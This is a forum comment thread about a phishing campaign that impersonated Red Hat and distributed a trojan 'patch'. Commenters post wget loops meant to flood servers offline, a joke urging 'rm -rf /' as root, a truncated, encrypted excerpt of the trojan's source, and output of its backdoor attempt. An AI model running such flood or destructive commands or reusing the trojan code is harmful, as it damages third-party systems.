Either way, kind of forcing the average joe to putt around in non-root would probably go a long ways towards making the computer more secure.

The good thing about this is it is MUCH more possible to do this sort of thing in linux than windows since every windows installer insists on spewing files all through the system directories, so require admin access to install.

Ah well an idea anyways :)

Re:Stupid Tricks?

[OmegaBlac]

What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?

Nothing. Really what can you do? Do we try yo educate the joe users of the world? You can attempt to drum it in their heads so many times but they will still do stupid stuff to get infected. Well maybe deny them Internet access so their comprimised PCs won't affect the rest of us connected to the Internet. That sounds like a winner to me.

Re:Stupid Tricks?

[Rie+Beam]

"What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?"

No monitor.

Re:Stupid Tricks?

man sudo

Re:Stupid Tricks?

[suckmysav]

> The stupidest people I've ever met are the ones
> who think they know everything."

Ain't dat da truth!

> Your average 14 year old who installs gentoo
> and now considers himself a giant in the world
> of computing fits the bill.

I've not met a 14yo who isn't completely wedded to Windows myself. As always, YMMV. What with all "da mad gamez" and "teh free music on kazaa" and all, the last thing most of them are interested in is compiling stuff from source code.

Slightly OT: I had a discussion this very weekend with a coupla 14 year olds. My nephew and his mate were visiting my place. Inevitably, I was asked whether they could "use the internet", so I sat them down at my Linux box and told them to go for it (I have a windows PC too, but I'm not stupid enough to let a pair of 14yo's surf the web with it)

It didn't take long before they were asking me how they can download all the "free music from the internet". I asked them what they meant by that. Apparently, according to one of these kids, all you need is Windows + Windows Media Player and you can download free music from the internet. He had no idea you had to pay a buck a song for the privelege let alone that it came fully infected with MS DRM. I haven't actually tried MSN music store, but I'm pretty sure that your chances of downloading the latest Usher crapfest from there for free are just about zero. Of course the subject of Kazaa followed soon after. I put the kaibosh on that as well.

I don't hold out much hope for the next generation of geeks, I must say.

Re:Stupid Tricks?

[_Sprocket_]

I don't hold out much hope for the next generation of geeks, I must say.

That's not the next generation of geeks. That's the usual consumer who's finally adopting technology that had been the cutting edge realm of geeks past.

Re:Stupid Tricks?

[thinkninja]

SELinux with a strict policy. However, Fedora/Redhat found that a strict policy tends to break too much stuff, from what I gather, and have instead created a 'targeted' policy to lock down daemons such as dhcpd, httpd, syslogd, etc.

Of course, ultimately a user can destroy any system they have local access to with enough perseverance. That's their prerogative :(

Re:Stupid Tricks?

Or keyboard

Re:Stupid Tricks?

>> What can be done to prevent this from happening in the future?

Nothing.

You can't make things foolproof because fools are so ingenius.

Re:Stupid Tricks?

as a community we need to address these types of issues.

We do. The man just told you; tell them to rm -rf / as root. That addresses the issue nicely.

Re:Stupid Tricks?

The stupidest people I've ever met are the ones who think they know everything

So that would be you and who else?

Surprisingly

[Mentorix]

Running untrusted code can result in system compromise.

Everyone checks the gpg signatures right?

Re:Surprisingly

[squarefish]

I wouldn't be so sure that everyone even has the slightest idea of how to begin in checking the gpg signature

Re:Surprisingly

[bcs_metacon.ca]

You don't have to. If you use a package installer like up2date, yum, or apt, they will complain loudly if a package isn't appropriately signed. This all happens without the user knowning anything about it. And unlike Windows, there's no inviting "Trust this software? Yes/No" dialog -- turning off trust is a little more complicated than that, and requires administrator access.

Re:Surprisingly

[Rykky]

Well.. RedHat distros have you import their GPG key into RPM the first time you run up2date. Then RPM takes care of the signature checking for us and cries bloody murder when a package isnt signed or is signed incorrectly.

Slashdot

I would not worry, this page will prob be hit by the slashdot effect and be taken down just byu that....

Use the /. effect for good

[JamesTRexx]

Now if each time when someone tries this sort of thing gets their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D

Re:Use the /. effect for good

[sfire]

And how much you want to bet that the server was hacked, and the real owner of the server is going to have to foot the bill?

Re:Use the /. effect for good

[joeljkp]

$ while true; do wget http://fedora-redhat.com/index.htm; rm index.htm; sleep 1; done

Re:Use the /. effect for good

[YOU+LIKEWISE+FAIL+IT]

Just fyi, instead of using rm, use the --delete-after option to wget.

YLFI

Re:Use the /. effect for good

while true; do wget --cache=off http://eyetech.co.uk/DOWNLOAD/CYBER011.LHA; rm CYBER011.LHA; sleep 1; done

Kill these scriptkiddie fuckers. Kill them hard.

Re:Use the /. effect for good

[C_Kode]

Just fyi, instead of using --delete-after option run wget from /dev/null ;)

One less operation, and the deed is still done.

Re:Use the /. effect for good

[SnowZero]

Yay we win! The site is down now; After 300 downloads it doesn't work anymore :) I was using the following to keep rough track of how many downloads I was doing:

for (( i=0; i100; i++ )) do { wget -O /dev/null www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz } done

Re:Use the /. effect for good

[rts008]

I can see the smoke from here! I hope he feels the flames from his box crawling up his ass like wildfire. GOOD JOB!

Cry havoc!

[LittleLebowskiUrbanA]

and let slip the trolls of Slashdot! Let's see how long before this guy gets hacked and his personal IP address/physical address are posted on here.

You can almost feel sorry for the guy :)

Re:Cry havoc!

[sfire]

And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

Re:Cry havoc!

[LittleLebowskiUrbanA]

Yeha, this will be an interesting write up sooner or later. First of its kind for OSS if I'm not mistaken. Guess we're finally Enterprise level Microsoft now.

Re:Cry havoc!

You're saying an innocent third party had a domain called "fedora-redhat.com" ? Sorry, you'll not get any sympathy here.

Re:Cry havoc!

[suckmysav]

If I was to hack into an innocent parties server and gain control of its webserver program (or even install one of my own) then there is nothing to stop me from also; a) ascertaining its IP address b) registering a domain c) pointing www.bodgy-domain.com at that IP address d) loading the trojan and a webpage onto the compromised server e) profit!

Source code!

[pac1085]

Well, whatever it is, it comes with its source code! inst.c is in the tarball, check it out.

Re:Source code!

Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.

Re:Source code!

[andfarm]

Nope.

inst.c is the core of the program; fileutils-patch.bin is chaff - it isn't used.

Confidence

[FiReaNGeL]

OK, we all know no Linux Guru will ever fall for this kind of stupid trick.

But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.

Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.

Re:Confidence

[bcs_metacon.ca]

Yes, of course they do. Red Hat Enterprise has Red Hat Network, SUSE has YOU, and Fedora Core has GPG signed distro channels.

When I set up a system for a "non-technical user", I set up the patches to be automatic (they go through a rigorous QA assessment -- I've never seen a "bad" patch in a final version of Fedora Core). I also don't give the NTU the root password, or install development utils -- so there's no way this phish/trojan could affect one of the systems I administer.

Re:Confidence

[FiReaNGeL]

I hate to show my ignorance, but this is an excellent thing ;) And...

In Soviet Russia, SUSE has YOU! :P

Re:Confidence

[Mentorix]

Yes, redhat has a webbased update page, but you can do it semi-automatically as well now. Doesn't work as good as with some other distro's in my experience.

Debian and Gentoo have built software management policies right into their core system. Just click on update and let the machine take care of itself. All annoying dependency stuff gets taken care off by itself and security updates can be scheduled to run automatically.

Re:Confidence

[dtfinch]

Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.

For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.

Re:Confidence

There is no web service.

We go:

apt-get update
apt-get upgrade

or

yum upgrade

It patches all our programs from games to OS to system utilities to word proccessors.

Unlike Window's which only works on the core OS.

Re:Confidence

[Biogenesis]

I know that Debian has an apt repository that's something like security.debian.org, if it's in your sources.list apt will get updates from it when you ask it (apt-get dist-upgrade for example). I'm fairly sure Redhat has a similar thing via some update program but I've only opened it and had a poke around, never acutally used it for anything.

Re:Confidence

[scottking]

i'd agree if you didn't have to compile your own viruses.

Re:Confidence

[FuzzyBad-Mofo]

Debian and Gentoo have built software management policies right into their core system.

So does Fedora (and Red Hat). It's made me an apt fan. :)

Re:Confidence

Sounds like you haven't been running RH in say... three years or so?

Hint: RH has full-auto system, just as much "in the core" as are those of the rest, and has had for a long while.

But hey, don't let that get in a way of FUD'ing, who cares about those pesky facts anyway?

Re:Confidence

[shish]

a webservice for updates, akin to windowsupdate.com?

Nearly all of them do; and unlike windows update, the linux updates are for /all/ the software on the PC, not just the company's own stuff. They also tend to allow you to search through lists of heirachially organised trees of software, and install / uninstall at the check of a box, with dependancies and the like accounted for automatically.

Looking at the files..

[schmiddy]

First of all, this site should be shut down immediately. I'm not sure exactly what laws apply, but they're definitely guilty of spamming and spreading trojans, that should be enough in and of itself to notify their hosting provider.

I downloaded that tar file off the site to take a look at it. It contains a makefile, an inst.c , and a binary file "fileutils-patch.bin".

Looking at inst.c, I'm too lazy to figure out all the code on my own, but it's well commented and the functions are properly named, proper indentation, etc. (I suspect they probably just ripped off some open source programs, modified the code a bit, and turned it into a trojan.)

I think there's at least stuff in there to crack your password file since I see:
key(pswd, sizeof(pswd_t));
in there. I'm guessing the binary patch file does some nasty stuff as well.

P.S. I just looked at the binary file through strings. It is indeed a rip-off of some GPL program, since the following text is included at the beginning of the file:

fileutils-4.1.9-11
=u9F!
5928f30d339e2c8002986120e6abd2e7d4e61921
=u9F!
fileutils
4.1.9
The GNU versions of common file management utilities.
The fileutils package includes a number of GNU versions of common and popular file management utilities. Fileutils includes the following tools: chgrp (changes a file's group ownership), chown (changes a file's ownership), chmod (changes a file's permissions), cp (copies files), dd (copies and converts files), df (shows a filesystem's disk usage), dir (gives a brief directory listing), dircolors (the setup program for the color version of the ls command), du (shows disk usage), install (copies files and sets permissions), ln (creates file links), ls (lists directory contents), mkdir (creates directories), mkfifo (creates FIFOs or named pipes), mknod (creates special files), mv (renames files), rm (removes/deletes files), rmdir (removes empty directories), sync (synchronizes memory and disk), touch (changes file timestamps), and vdir (provides long directory listings). daffy.perf.redhat.com
Red Hat Linux
Red Hat, Inc.
Red Hat, Inc.
Applications/File
linux
i386

Re:Looking at the files..

[Qzukk]

According to "file" its an rpm renamed to .bin

Looking through the code, we have a function called untraceable() which runs as a separate process and kills the program if someone attempts to trace or debug it, but as distributed, this is not enabled.

Theres also an expiration option, which is currently disabled. It also apparently attempts to keep track of its operation by setting an environment variable starting with "x" then running itself again.

The rest of it seems to be encrypted in the large constant strings at the top of the page (these are expressed in octal)

Re:Looking at the files..

[Poleris]

"First of all, this site should be shut down immediately."

Exactly! Good thing T posted up the real link, now let's watch as it gets /.'ed to death.

Re:Looking at the files..

now let's watch as it gets /.'ed to death.

Yeah, good luck slashdotting it.

$ host www.fedora-redhat.com
www.fedora-redhat.com is an alias for premium4.geo.yahoo.akadns.net.

Re:Looking at the files..

[Negative+Response]

Compare that C code with this C file. I'd guess it's a small rpm installer, just in case you are not using a rpm based system.

Nice spelling

Thoughtful post though!

The amazing thing is

[antifoidulus]

They seem to be able to master phishing and obfuscated code, but they just can't get the English language:
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only.

Re:The amazing thing is

[Rick+Zeman]

They seem to be able to master phishing and obfuscated code, but they just can't get the English language:

Sounds like CDR Taco who mastered perl's syntax, but not that of American English.

Re:Must be some mistake

You're an idiot.

Re:Must be some mistake

[Nikker]

But did they allow you to download the source ???

Re: text

[Inf0phreak]

Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).

Trademark infringement...

[}InFuZeD{]

I'd like to see Redhat sue the owner of the domain for trademark infringement ;)

Obviously it was a malacisious use of the domain, and I think the verdict is pretty much secured, so it would be fun.

Re:Trademark infringement...

[}InFuZeD{]

Ok, that was a horrible misspelling of malicious :|

Re:Trademark infringement...

[balster+neb]

Not only is the domain infringing their trademark, he's also using their logo and pretending to be them.

This guy is going to be in deep trouble. Red Hat will take this pretty seriously IMO.

PHEW!

[big+daddy+kane]

I'm sure glad I'm using windows!

Re:PHEW!

Sooner or later, one of these is gonna compile under Cygwin...

Re:PHEW!

You shouldn't be glad--just because one potential virus has been created for the few dumb and/or gullible linux users doesn't mean windows is safe. It's infinitely less secure and anyone with common sense shouldn't fall for this scam either.

Re:PHEW!

[M51DPS]

Sooner or later, one of these is gonna compile under Cygwin...

I wonder how well it will compile under Mac OS X. We are now compatible with everything Unix, including phishing scams!

Re:PHEW!

Cool!

does it or not ?

[Matt_Joyce]

It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code."

Either it is malicious or not.
Don't they know ?

If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.

What the definition of 'malicious code' anyway ?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.

Re:does it or not ?

[ln+-sf+head+ass]

It's lawyer-speak. They want to convey it's malicious, but don't want them to open themselves up to a libel suit. Yes, it's dumb.

Most users, sure

[JustOK]

Sure, I'm hopping that > 99.99999% of current users will spot this within seconds. Yet, I thought I heard the idea was to get more people using linux. That would include a number of people who get infected in dumb ways on MS. Unless there machines are totally locked down (or adminned by the "linite"), its gonna happen. Maybe it happening now, and proper defenses being designed will be a good thing.

Spelling/Grammar?

[hereschenes]

"Anybody running RedHat and Fedora are strongly adviced to apply this patch!"

Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!

Re:Spelling/Grammar?

[ScrewMaster]

Probably because most of them are in Nigeria.

Re:Spelling/Grammar?

[bani]

a growing % of these criminals are from saudi arabia or the netherlands.

they still can't spell for shit though.

Re:Spelling/Grammar?

[lowlands]

No they are not *from* the Netherlands. They are Nigerians *living* in the Netherlands. In the "Bijlmer" area of Amsterdam to be exact. At least until recently because they got their sorry asses kicked out of the country.

Re:Spelling/Grammar?

[khrtt]

He's Romanian:

http://www.google.com/search?hl=en&q=inca+un+roo t+ frate+belea&btnG=Google+Search

See how most of the results are in .ro? He must be Romanian.

Re:Spelling/Grammar?

[bani]

there still seem to be lots of them. dutch ISPs dont seem too worried about getting rid of them, seeing as i will get repeat nigerian scams from the same ip address for weeks or months on end. eg tiscali.nl, home.nl, solcon.nl, bbeyond.nl, concepts.nl...

i have to wonder though -- why is the netherlands the favorite residence of nigerian criminals, next to their native nigeria?

meh, i guess i sort of answered my own question... dutch ISPs are lazy, that's why nigerian criminals love to operate their scams in the netherlands.

Re: I'll try it... Execution results!

[enginuitor]

Identifying the system. This may take up to 2 minutes. Please wait...
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key: /etc/ssh/ssh_host_key
Could not load host key: /etc/ssh/ssh_host_rsa_key
Could not load host key: /etc/ssh/ssh_host_dsa_key
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.

Patching "ls": ###########
Patching "mkdir": ##########

System updated and secured successfully. You may erase these files.

Linux - Where the malware comes with the source

[cranos]

Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!

Re:Linux - Where the malware comes with the source

[Chrispy1000000+the+2]

Hey, just be thankful that you *might* not know what you are compiling. You require *real* user intervention to use that viral sig that pop's up from time to time.

Re:Linux - Where the malware comes with the source

[/dev/trash]

You think you have it bad? I run Gentoo. I'm still compiling all the files needed for this one to run.

Re:Linux - Where the malware comes with the source

[eyepeepackets]

WOo, great laugh, that was seriously funny!

Thanks!

Re:Linux - Where the malware comes with the source

Be glad you're not on *BSD. Not only is BSD dying,
but I'll have to wait a week for someone to get this
virus working on a BSD system then upload it to
pkgsrc and only then will I be able to download and
compile it (after the patches of course).

If you can't tell, I use NetBSD. :)

Re:Linux - Where the malware comes with the source

[Ziviyr]

A Commodore 128 would be twice as fast as your Commodore 64, and you'd swap memory less too!

Re:Linux - Where the malware comes with the source

[jmv]

But RedHat already has a patch out:

rpm -e gcc

Re:Linux - Where the malware comes with the source

[Stevyn]

to speed it up, try this command:

# ACCEPT_KEYWORDS="~virus" emerge --oneshot trojan

make sure you enable -funroll-loops and -pipe or else the program runs waaay to slowly. Don't use GCC 3.4 or else it fails.

Re:Linux - Where the malware comes with the source

[Antique+Geekmeister]

Actually, that's a damn good idea. For non-developer systems, such as firewalls, file servers, mail servers, etc., it's basic security to remove the compiler to avoid exactly this sort of local compilation, either by an idiot user or by a script kiddie's successfully installed package. Think of it as disabling an unnecessary network port.

Re: I'll try it... Execution results!

[Peridriga]

Well... Thats all well and good... How about actually posting the source and what it does instead of the output...

Use SPF to protect yourself from phishing

[taubz]

If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

(Disclosure: I wrote the plugin. :) )

Re:Use SPF to protect yourself from phishing

But how do we know that it isn't a trojan? (Is an unsigned, third party extension, not on official update site)

Re:Use SPF to protect yourself from phishing

[taubz]

Download it, unzip it, and inspect the code!

Re:Use SPF to protect yourself from phishing

[ender81b]

cool extension. Of course, now I just realize that the ISP I work for doesn't publish SPF records (although we do use SPF odd). Oh well. nifty little plugin.

Re:Use SPF to protect yourself from phishing

[cortana]

I don't see the original email, but I'd bet that it came from something@fedora-redhat.com, and so the SPF record for redhat.com would not have been useful in this case. :)

On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).

1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.

2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?

I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Recieved-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.

SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a seletion of message headers.

Of course, if I'm wrong about any of this, please correct me. :)

Re:Use SPF to protect yourself from phishing

[bigberk]

This is misleading. SPF might help verify that this email didn't come from redhat.com, but SPF isn't going to help you in general:

• The envelope sender could have not been @redhat.com but the From field could have contained redhat.com; then, there is no SPF to check and you can't benefit from redhat's SPF record
• The sender could have used a fedora-redhat.com address and published an SPF record for their own domain. Spammers already do this. The SPF check tells you nothing about authenticity. The SPF check would succeed, and it could still be a forgery.

Re:Use SPF to protect yourself from phishing

[taubz]

> I'd bet that it came from something@fedora-redhat.com

Check out the link I posted and see the screenshot -- it worked. The From: address was @redhat.com.

> The From address used by the plugin comes from the From: header in the message?

Yes. Does it matter that the SPF spec says to use the return path? Is this any less useful?

> 2. What happens if I open a message I stored from a few months/years ago

It will only check very recent messages. In other cases it will show a warning.

The extension isn't meant to replace SPF at the MTA level; it's meant to complement it. It's another layer of badly needed protection.

Re:Use SPF to protect yourself from phishing

[taubz]

I admit I may have exaggerated SPF's usefulness, but that's not a fair characterization either.

Without SPF, you don't know anything about the source of an email. With SPF at least you know the domain it came from. You may not know who owns the domain, but you do have one more piece of reliable information than you had before.

Re:Use SPF to protect yourself from phishing

[Bloater]

How do we know this isn't a trojan ;)

Re:Use SPF to protect yourself from phishing

[cortana]

> Check out the link I posted and see the screenshot -- it worked. The From: address was @redhat.com.

The point is that you cannot tell. The From header in the email itself tells you nothing. It is forgery of the the SMTP envelope sender that SPF guards against.

Consider:

220 some mailserver... ready!
MAIL FROM: sneaky@fedora-redhat.com
250 OK
RCPT TO: some_innocent@hotmail.com
250 OK
DATA
354 you have a go
From: security@redhat.com
Subject: EMERGENCY SECURITY PATCH APPLY NOW!

Etc etc. The SPF check is performed against sneaky@fedora-redhat.com--as per the SPF specification. The recipient of the message never sees sneaky@fedora-redhat.com, however, and is none the wiser.

SPF certifies the envelope sender of a message, ensuring that an email has a non-forged return parth.

> Yes. Does it matter that the SPF spec says to use the return path? Is this any less useful?

Yes, and yes! Standard exist for a reason, ne? From the SPF FAQ:

---8---

Does [SPF] protect the "From:" header field?

SPF was designed to protect the envelope sender. That means the return-path that shows up in "MAIL FROM", and to a lesser extent the HELO argument that is supposed to be an FQDN. ...

Protecting authorship information is an important goal. However, the technical issues associated with protecting the "From:" header are much more numerous and challenging. The best way to protect the header "From:" is by using a cryptographic signature such as S/MIME, PGP, or (when it is released) Yahoo DomainKeys.

If you want to use the "From:" header as the subject of authentication with SPF, you need to be familiar with the following:

* mailing lists
* /etc/aliases-style forwarding
* MUA "resend this message to"
* web-generated email
* the Sender header
* the Resent-Sender and Resent-From headers

---8---

Checking the From header at the MUA would prevent me, for example, sending email from anywhere except my ISP's servers. I would no longer be able to set up remailers to allow me to have mail from several addresses sent to my main address, and so on. Other stuff as in the list above will also break...

Re:Use SPF to protect yourself from phishing

[Val314]

thanks, but your server is sending this as plain text, maybe its time to check the mime settings

Re:Use SPF to protect yourself from phishing

[Antique+Geekmeister]

Your points about the MAIL FROM are quite correct. However, the Microsoft reference isn't. Microsoft has attempted to hijack the development of SPF by introducing their SenderID software into SPF and taking credit for the original SPF in the process, and in the process making it proprietary and actually breaking it for people using the old tools. But it turns out that the developers and people writing the RFC's and proposals in Madrid finally gave up trying to integrate Microsoft's weirdness in exhaustion. Microsoft's addition of extremely bad, XML-based, user authentication keys signed by a central office and inserted into the email headers so you have to write a Microsoft patent-using XML parser into your SMTP server has been thrown out due to the encumberment. SPF where the final "Received:" line gets analyzed for connections that violate the sending policies of the upstream SMTP server, rather than the mail client's SMTP server, can still be done. But it's really a lot better to do it automatically at the SMTP server, as you mention.

Coding 0, Grammar 0.

[monoi]

Anybody running RedHat and Fedora are strongly adviced to apply this patch!

But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!

Re:Coding 0, Grammar 0.

[Mr.Ned]

The message was also sent to a FreeBSD list. That caused quite a chuckle.

Re: I'll try it... Execution results!

[enginuitor]

It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

Coming soon...

[cuteseal]

*In an ominous voice over*

"This fall... a malicious trojan / virus / spyware... coming soon to a linux terminal near you..."

mkdir and ls?

[mrfibbi]

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

Because we all know how dangerous and root-related those commands can be. For christ's sake. Can't they at least come up with some sort of sudo-related vulnerability that at least sounds plausible?

Re:mkdir and ls?

heh, you got lost in the noise man.

even the dumbest script kid on efnet knows
this is impossible below.

> Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

Re:mkdir and ls?

[pclminion]

Perhaps the intention was to determine what percentage of Fedora users are absolute fucking morons? With no prior evidence, I'd wager quite a few.

Re: I'll try it... Execution results!

here you go

Here is the code to inst.c

[quantumraptor]

#if 0
shc Version 3.7, Generic Script Compiler
Copyright (c) 1994-2003 Francisco Rosales <frosal@fi.upm.es>

shc -v -r -T -f redhat
#endif

static long date = 0;
static char mail[] = "Please contact your provider";
static int relax = 1;
typedef char pswd_t[433];
static char pswd[] =
"\112\326\126\023\345\101\227\242\127\260\241\033\ 143\344\132\161"
"\071\320\301\103\056\023\044\053\136\365\273\307\ 014\033\346\213"
"\012\176\145\076\305\057\222\140\013\163\022\014\ 266\152\133\056"
"\055\055\117\325\077\140\120\025\356\256\310\170\ 017\153\162\107"
"\225\266\313\200\345\263\017\174\224\255\001\005\ 012\151\271\322"
"\356\260\322\136\126\347\347\026\162\253\362\224\ 350\150\071\147"
"\347\202\366\114\104\134\277\102\343\302\275\107\ 144\271\053\002"
"\337\045\271\361\045\310\070\327\241\313\227\271\ 163\003\046\026"
"\232\241\345\152\151\375\036\365\323\246\050\227\ 325\140\023\126"
"\020\363\136\323\032\333\176\021\016\325\274\114\ 304\144\171\232"
"\356\176\170\257\340\133\311\172\132\363\307\323\ 312\221\237\373"
"\000\204\246\324\174\215\166\237\276\376\044\320\ 373\345\034\107"
"\355\013\234\346\316\133\072\157\104\317\250\006\ 063\232\321\355"
"\121\202\217\343\207\370\115\072\150\310\231\213\ 151\155\133\166"
"\237\207\324\236\014\107\335\271\306\022\022\257\ 061\133\062\355"
"\213\173\122\100\272\266\257\332\355\302\117\062\ 074\063\275\145"
"\073\056\143\151\031\303\210\151\331\353\262\246\ 336\143\257\210"
"\060\321\040\143\142\001\363\261\302\164\052\125\ 375\160\115\252"
"\354\264\302\050\360\266\132\047\365\053\101\027\ 051\052\165\223"
"\371\316\001\011\027\314\255\273\123\373\356\330\ 035\074\212\313"
"\343\225\026\114\201\154\250\212\064\140\023\114\ 074\226\306\021"
"\236\244\330\037\001\222\135\211\045\047\357\177\ 000\045\024\366"
"\250\215\335\116\171\170\026\335\273\106\037\225\ 366\104\103\162"
"\045\032\371\270\031\067\212\016\113\213\355\103\ 010\063\164\323"
"\354\115\214\262\241\111\230\102\106\172\327\260\ 047\301\146\261"
"\016\241\274\062\024\143\121\117\047\337\141\321\ 311\000\114\134"
"\132\053\236\061\232\035\250\154\016\165\060\141\ 202\212\047\175"
"\352\366\271\064\335\347\045\356\276\220\027";
t ypedef char shll_t[8];
static char shll[] =
"\027\227\104\215\344\060\226\051\353\036\220\073\ 114\040\167\126"
"\012\043\340\355";
typedef char inlo_t[3];
static char inlo[] =
"\036\173\055\223\266\275\074\222\066\027";
typed ef char xecc_t[15];
static char xecc[] =
"\136\317\002\017\371\053\007\345\165\066\036\162\ 266\047\013\261"
"\363\204";
typedef char lsto_t[1];
static char lsto[] =
"\347\047\233\033\245\043\257\234\252\240\037\262" ;
#define TEXT_chk1 "KTZE4lIVf7i4BR"
typedef char chk1_t[15];
static char chk1[] =
"\176\150\322\244\275\145\026\000\230\311\274\166\ 150\124\334\163"
"\053\372\006\215";
typedef char opts_t[1];
static char opts[] =
"\331\051\317\253\133\114\076\242\237\252\144\142" ;
typedef char text_t[1199];
static char text[] =
"\302\214\330\267\274\114\354\115\323\353\153\135\ 350\215\100\341"
"\364\315\074\102\276\122\042\345\157\237\003\103\ 246\341\370\334"
"\354\221\33

Christ, they didn't do a very good job...

[Nailer]

The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

• Most users who install security upgrades won't be running Red Hat 7.x.
  
• Red Hat is two words. Both begin with capitals.
  
• Red Hat use packages. Not hard guys.
  
• Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
  
• The exclamation marks in 'Apply this patch!' seem a little un vendor-like
  

Re:Christ, they didn't do a very good job...

[frankthechicken]

This was version 0.1 of the trojan, and is not yet ready for public release. With helpful contributions like your, we hope to use the "many eyes" approach, in keeping with the OSS philosophy, to form a complete and fully featured trojan.

Thus we would like to thank you for your generous time in helping this valuable project reach its full potential.

You may also like to take note of our web site www.bugzilla-Fedora-Redhat.com, where we have set up a forum dedicated to improving our product.

Re:Christ, they didn't do a very good job...

[aldoman]

RE: RedHat 7.3, frankly that's BS. 7.3 and 9 are very heavily used, still.

Re:Christ, they didn't do a very good job...

[Nailer]

That's true, but it doesn't make what I said untrue. Neither Red Hat nor Fedora Fegacy provide security updated for 7.3 and 9. Hence people who care about host security tend not to run these releases.

Re:Christ, they didn't do a very good job...

[AndroidCat]

The Mcrosoft "security updates" aren't very good either, but it's amazing how many I get from boxes where the people said yes.

Re:Christ, they didn't do a very good job...

[harlows_monkeys]

Neither Red Hat nor Fedora Fegacy provide security updated for 7.3 and 9

Uhm...you are massively confused. The whole point of Fedora Legacy is to provide such updates.

Re:Christ, they didn't do a very good job...

[WindBourne]

What do you mean it is not done??? It has the MS quality control stamp all over it. It is not a bug, it is a feature. :):):)

Re:Christ, they didn't do a very good job...

[Puff+Daddy]

Don't you mean www.bugzilla-Fedora-RedHat.com?

Re:Christ, they didn't do a very good job...

[thegrassyknowl]

They don't have to fool everyone, just a bunch of select, clueless newbies. There were very complete instructions to build the "patch".

Us educated users know you don't patch like that (along with all the other warning signs), and would think twice about it.

Clueless newbies would just follow the link, get the file and enter the commands verbatim, thus getting "patched". There are a lot of people who don't stop to think at all.

Has anyone looked in the source to see what it actually does?

Re:Christ, they didn't do a very good job...

[Erik+Hollensbe]

7.3 is widely used. It's because it was the last version of RH that wasn't nearly as chained to the desktop before the Fedora guys came in (who some would say made it worse).

Most of the people running 7.3 are either doing it because it's too costly to upgrade (money is generally not as much of a problem as time or suggestively, downtime) and a good admin can keep things patched regardless.

Those that are moving but are keeping RedHat are generally looking at RHEL. 7.3 is no longer supported which is the prime motivator, not any technological benefit.

God damnit, I hate it when some clueless fart machine spits out something that is patent B.S. and then covers it all under the umbrella of "security". Even the servers with the best service contracts don't rely on that to make their systems "secure". It's common practice to "roll your own" where it's really important.

Re:Christ, they didn't do a very good job...

[Nailer]

I am. Pardon, I thought FL had ended support for 7.3/ 9 already. They haven't (there was discussion of this on a mailing list recently, and I assumed it had been implemented).

Re:Christ, they didn't do a very good job...

[Nailer]

It's common practice to "roll your own" where it's really important.

It's a common bad habit usually done to satisfy the ego of the admin. Most Red Hat customers use the distro because of the support arrangements available. That support, which doesn't exist for third party packages (including 'roll their own') is more valuable than the ego boost the admin gets from doing things themselves.

